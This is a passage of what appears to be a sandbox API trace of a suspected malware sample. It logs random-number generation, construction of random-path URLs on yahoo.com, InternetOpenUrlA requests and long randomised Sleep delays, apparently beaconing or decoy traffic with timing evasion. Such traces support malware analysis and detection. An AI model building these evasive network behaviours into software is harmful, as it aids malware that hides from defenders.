pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0193.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16828, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x3a16828) returned 0x0 [0193.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0193.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.946] GetProcessHeap () returned 0x440000 [0193.946] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473980 [0193.946] lstrcpyA (in: lpString1=0x473980, lpString2="\x1dýçÅs://www.yahoo.com" | out: lpString1="\x1dýçÅs://www.yahoo.com") returned="\x1dýçÅs://www.yahoo.com" [0193.946] lstrcatA (in: lpString1="\x1dýçÅs://www.yahoo.com", lpString2="/pfw70JgNpv758a9qXtv/e8rbna5gt2t2tlZ9uw/ard7uDff5s2krJyipFiJ9Nm5ynunrrr0a2996ylYg1u/" | out: lpString1="\x1dýçÅs://www.yahoo.com/pfw70JgNpv758a9qXtv/e8rbna5gt2t2tlZ9uw/ard7uDff5s2krJyipFiJ9Nm5ynunrrr0a2996ylYg1u/") returned="\x1dýçÅs://www.yahoo.com/pfw70JgNpv758a9qXtv/e8rbna5gt2t2tlZ9uw/ard7uDff5s2krJyipFiJ9Nm5ynunrrr0a2996ylYg1u/" [0193.946] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0193.947] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x1dýçÅs://www.yahoo.com/pfw70JgNpv758a9qXtv/e8rbna5gt2t2tlZ9uw/ard7uDff5s2krJyipFiJ9Nm5ynunrrr0a2996ylYg1u/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0193.947] GetProcessHeap () returned 0x440000 [0193.947] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473980 | out: hHeap=0x440000) returned 1 [0193.947] GetProcessHeap () returned 0x440000 [0193.947] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16800 | out: hHeap=0x440000) returned 1 [0193.947] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0193.947] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0193.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0193.948] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0193.948] Sleep (dwMilliseconds=0x12a64) [0194.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0194.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0194.155] GetProcessHeap () returned 0x440000 [0194.155] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f4e30 [0194.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0194.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f4e31, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x4f4e31) returned 0x0 [0194.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0194.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.161] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.161] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.161] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.161] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.161] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.161] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.162] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.162] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.162] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.162] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.162] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.163] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.163] GetProcessHeap () returned 0x440000 [0194.163] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473da0 [0194.163] lstrcpyA (in: lpString1=0x473da0, lpString2="\x98µ¥Òs://www.yahoo.com" | out: lpString1="\x98µ¥Òs://www.yahoo.com") returned="\x98µ¥Òs://www.yahoo.com" [0194.163] lstrcatA (in: lpString1="\x98µ¥Òs://www.yahoo.com", lpString2="/adbO553XpyUrr50jrs5ddd25o37rnivp/" | out: lpString1="\x98µ¥Òs://www.yahoo.com/adbO553XpyUrr50jrs5ddd25o37rnivp/") returned="\x98µ¥Òs://www.yahoo.com/adbO553XpyUrr50jrs5ddd25o37rnivp/" [0194.163] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0194.163] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x98µ¥Òs://www.yahoo.com/adbO553XpyUrr50jrs5ddd25o37rnivp/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0194.163] GetProcessHeap () returned 0x440000 [0194.163] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473da0 | out: hHeap=0x440000) returned 1 [0194.163] GetProcessHeap () returned 0x440000 [0194.163] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f4e30 | out: hHeap=0x440000) returned 1 [0194.163] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0194.164] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0194.164] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0194.164] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0194.164] Sleep (dwMilliseconds=0x19a2f) [0194.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0194.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0194.395] GetProcessHeap () returned 0x440000 [0194.395] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a03350 [0194.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0194.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a03351, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a03351) returned 0x0 [0194.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.583] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0194.583] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.583] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.583] GetProcAddress 